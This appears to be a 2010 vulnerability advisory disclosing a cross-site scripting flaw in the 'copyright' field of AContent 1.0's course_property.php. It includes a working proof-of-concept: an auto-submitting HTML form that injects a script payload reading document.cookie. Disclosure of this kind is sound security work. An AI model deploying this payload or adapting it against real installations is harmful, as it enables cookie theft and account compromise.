SecurityvulnsSECURITYVULNS:DOC:24762XSS vulnerability in AContent
Vulnerability ID: HTB22598
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_acontent_course.html
Product: AContent
Vendor: Inclusive Design Institute ( http://www.atutor.ca/ )
Vulnerable Version: 1.0
Vendor Notification: 01 September 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "home/course/course_property.php" script to properly sanitize user-supplied input in "copyright" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/home/course/course_property.php?_course_id=COURSE_ID" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="_course_id" value="COURSE_ID" />
<input type="hidden" name="title" value="Creating Lesson in AContent" />
<input type="hidden" name="category_id" value="0" />
<input type="hidden" name="pri_lang" value="en" />
<input type="hidden" name="description" value="Learn how to" />
<input type="hidden" name="copyright" value='1"><script>alert(document.cookie)</script>' />
<input type="submit" name="submit" id="sbmtit" value="Save" />
</form>
<script>
document.getElementById('sbmtit').click();
</script>